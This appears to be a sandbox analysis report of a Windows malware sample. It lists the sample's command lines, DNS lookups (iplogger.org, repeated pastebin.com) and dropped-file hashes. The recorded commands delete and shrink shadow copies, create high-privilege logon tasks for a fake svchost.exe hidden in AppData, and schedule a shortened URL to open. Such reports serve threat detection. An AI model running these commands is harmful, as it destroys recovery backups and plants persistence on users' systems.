C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "02:28" /sc daily /mo "3" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "05:08" /sc daily /mo "2" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "12:13" /sc daily /mo "2" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "15:52" /sc weekly /mo "5" /d "Thu" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "23:07" /sc monthly /m "aug" /tn "WinSAT" /tr "'explorer'https://bit.ly/3hfQB4H"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp

Files

memory/2684-0-0x00007FF830B93000-0x00007FF830B95000-memory.dmp

memory/2684-1-0x0000023AD3860000-0x0000023AD38A2000-memory.dmp

memory/2684-2-0x00007FF830B90000-0x00007FF831652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdnl1i0o.vjo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4664-5-0x000002279E540000-0x000002279E562000-memory.dmp

memory/4664-12-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/4664-13-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/4664-14-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/4664-15-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/4664-18-0x00007FF830B90000-0x00007FF831652000-memory.dmp

memory/2684-20-0x00007FF830B93000-0x00007FF830B95000-memory.dmp

memory/2684-21-0x00007FF830B90000-0x00007FF831652000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 16deda7a7a2e8f354fbff30ad723a711
SHA1 8730e18a2fc9722f7700c1192b3cc941169d7701
SHA256 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
SHA512 6a19f30f3eca499e14ab97c5055420cc352852b9e5caeeaf016cd6c707dee6837b92bd7a49e7ca288e391205f3ae0786f43a4fef1ca01e5829594edfe60108cd

memory/2684-33-0x00007FF830B90000-0x00007FF831652000-memory.dmp